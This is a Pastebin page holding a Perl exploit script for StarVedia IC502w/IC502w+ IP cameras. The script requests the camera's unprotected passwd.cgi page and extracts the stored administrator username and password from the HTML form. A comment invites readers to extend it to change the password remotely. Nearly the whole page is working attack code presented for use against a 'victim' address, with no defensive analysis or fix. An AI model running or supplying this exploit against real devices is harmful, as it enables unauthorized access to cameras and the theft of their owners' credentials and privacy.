hackerscommunity

StarVedia IPCamera IC502w IC502w+ u:p disclosure exploit

Jul 11th, 2015
390
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.52 KB | None | 0 0
  1. #!/usr/bin/perl
  2. #
  3. #  [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
  4. #  Author: Todor Donev
  5. #  Email: todor.donev at gmail dot com
  6. #  Type: Hardware
  7. #
  8. #  Thanks to Tsvetelina Emirska the best friend in my life
  9. #  and all my other friends for the help and support which
  10. #  gives me. Kind regards to all of you, who read my lil'
  11. #  exploits.
  12. #  Bulgaria, Sofia
  13. #  03.2013
  14. ##
  15. #  http://www.ethical-hacker.org/
  16. #  https://www.facebook.com/ethicalhackerorg
  17. #
  18. #  Another bug, hint: you can edit this code and add some lines for remote change the password.
  19. #####
  20.  
  21. use LWP::Simple;
  22. if (@ARGV == 0) {&usg;}
  23. while (@ARGV > 0) {
  24. $type = shift(@ARGV);
  25. $t = shift(@ARGV);
  26. }
  27. if ($type eq "-d") {
  28. my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!\n");
  29. print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n";
  30. print " [!] Exploiting: $t\n";
  31. if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
  32. $result .= "   [o] User: $1\n";
  33. }else{die(" Try another exploit, $!");}    
  34. if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
  35. $result .= "   [o] Password: $1\n";
  36. }else{die("Try another exploit or restart the exploit\n");}
  37. sleep(1);
  38. print " [\\m/] BINGO!!!\n\a".$result;
  39. }
  40. sub usg(){
  41. print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
  42. print " [!]  -d: disclosure password option\n";
  43. print " [!] exp: perl $0 -d 127.0.0.1 :)\n";
  44. exit;
  45. }
Add Comment
Please, Sign In to add comment